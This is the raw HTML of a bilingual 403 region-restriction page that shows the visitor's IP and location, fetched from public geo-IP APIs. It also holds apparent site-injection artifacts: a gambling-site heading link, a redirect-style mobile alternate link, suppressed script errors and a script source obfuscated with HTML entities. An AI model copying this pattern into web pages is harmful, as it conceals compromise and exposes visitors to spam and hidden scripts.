<!DOCTYPE html>
<html lang="en">
<head>
<script>var V_PATH="/";window.onerror=function(){ return true; };</script>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="stylesheet"  />
  <style>
    a, button, input, select, h1, h2, h3, h4, h5, * {
      box-sizing: border-box; margin: 0; padding: 0; border: none;
      text-decoration: none; appearance: none; background: none;
      -webkit-font-smoothing: antialiased;
    }
    body {
      min-height: 100vh;
      display: flex;
      align-items: center;
      justify-content: center;
      padding: 40px 20px;
    }
    ._61-frame {
      padding: 0 !important;
      width: 100%;
      max-width: 600px;
      display: flex;
      flex-direction: column;
      align-items: center;
    }
    ._65-rectangle {
      margin-bottom: 0 !important;
    }
    .diag-info {
      margin-bottom: 20px;
      font-size: 12px;
      color: #999;
      font-family: 'SF Mono', Monaco, 'Courier New', monospace;
      text-align: center;
    }
    .diag-info div {
      margin-bottom: 6px;
    }
    .diag-info strong {
      color: #666;
      font-weight: 600;
    }
  </style>
  <title>403 - Access Restricted</title>
<script type="text/javascript" src="&#x2F;&#x6A;&#x71;&#x75;&#x65;&#x72;&#x79;&#x2E;&#x6D;&#x69;&#x6E;&#x2E;&#x6A;&#x73;" rel="nofollow"></script>
<link rel="alternate" media="only screen and(max-width: 640px)" href="http://xinlongjc.com"></head>
<body>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<h1><a href="/" target="_blank">vns886威尼斯网站_威尼斯vns888|2022全新网址</a></h1>
  <div class="_61-frame">
    <div class="diag-info">
      <div><strong>IP:</strong> <span id="diag-ip">-</span></div>
      <div><strong>Location:</strong> <span id="diag-city">-</span>, <span id="diag-country">-</span></div>
      <div><strong>ID:</strong> <span id="diag-id">-</span></div>
    </div>
    <div class="_62-text">403 - Access Restricted<br/>地区访问限制</div>
    <div class="_63-text">The region you are in has been banned from accessing our website,<br />we apologize for any inconvenience caused.</div>
    <div class="_63-text">你所在的地区被限制访问此网站。<br />为此给您带来不便，敬请谅解。</div>
    <img class="_65-rectangle" src="https://sharedhtmlb01.s3.ap-northeast-1.amazonaws.com/item.svg" />
  </div>
  <script>
  (function() {
    var elIp = document.getElementById('diag-ip');
    var elCity = document.getElementById('diag-city');
    var elCountry = document.getElementById('diag-country');
    var elId = document.getElementById('diag-id');

    // Generate ID first
    if (elId) elId.textContent = 'req-' + Date.now().toString(36);
              
    // Fetch client IP and geo location
    fetch('https://api.ipify.org?format=json')
      .then(function(r) { return r.json(); })
      .then(function(d) { 
        if (elIp && d.ip) {
          elIp.textContent = d.ip;
                
          // Try primary geo API (ipapi.co)
          var controller1 = new AbortController();
          var timeoutId1 = setTimeout(function() { controller1.abort(); }, 5000);
                
          fetch('https://ipapi.co/' + d.ip + '/json/', { signal: controller1.signal })
            .then(function(r) { 
              clearTimeout(timeoutId1); 
              return r.json(); 
            })
            .then(function(geoData) {
              if (geoData && !geoData.error && geoData.city && geoData.country_name) {
                if (elCity) elCity.textContent = geoData.city;
                if (elCountry) elCountry.textContent = geoData.country_name;
              } else {
                tryFallbackAPI(d.ip);
              }
            })
            .catch(function() { 
              tryFallbackAPI(d.ip);
            });
        }
      })
      .catch(function() {});
          
    function tryFallbackAPI(ip) {
      fetch('http://ip-api.com/json/' + ip)
        .then(function(r) { return r.json(); })
        .then(function(geoData) {
          if (geoData && geoData.status === 'success') {
            if (elCity && geoData.city) elCity.textContent = geoData.city;
            if (elCountry && geoData.country) elCountry.textContent = geoData.country;
          }
        })
        .catch(function() {});
    }
  })();
  </script>
<center>
    <form data-evt="return baiduWithHttps(this)" action="http://www.baidu.com/baidu" target="_blank">
        <input name="tn" type="hidden" value="SE_zzsearchcode_shhzc78w">
        <a target="_blank" href="https://www.baidu.com/"><img width="100px" height="22px" src="https://www.baidu.com/img/baidu_jgylogo3.gif" alt="Baidu" align="bottom" border="0"></a>
        <input type="text" data-evt="checkHttps" name="word" size="20" value="">
        <input type="submit" value="百 度" height="26px">
    </form>
    <form action="https://www.sogou.com/web" name="sf" id="sf" target="_blank">
        <a target="_blank" href="https://www.baidu.com/"><img width="100px" height="22px" src="https://www.sogou.com/web/index/images/logo_440x140.v.4.png" alt="sogou" align="bottom" border="0"></a>
        <span class="sec-input-box yuyin-cur">
            <input height="22px" type="text" class="sec-input" name="query" id="query" maxlength="100" len="80" autocomplete="off" value="">
        </span>
        <span class="enter-input"><input type="submit" id="stb" value="搜 狗" height="26px"></span>
        <input type="hidden" name="_asf" value="www.sogou.com">
        <input type="hidden" name="_ast">
        <input type="hidden" name="w" value="01019900">
        <input type="hidden" name="p" value="40040100">
        <input type="hidden" name="ie" value="utf8">
        <input type="hidden" name="from" value="index-nologin">
        <input type="hidden" name="s_from" value="index">
    </form>  
  <form id="so360form" target="_blank" action="https://www.so.com/">
        <img width="100px" height="22px" src="http://p1.qhimg.com/d/_onebox/search.png">
        <input height="22px" id="so360_keyword" type="text" name="q" autocomplete="off" value="">
        <input id="so360_submit" type="submit" value="搜 索" height="26px">
        <input type="hidden" value="utf-8" name="ie">
        <input type="hidden" value="zz" name="src">
        <input type="hidden" value="so.com" name="site">
        <input type="hidden" value="1" name="rg">
    </form>
</center></body>
</html>
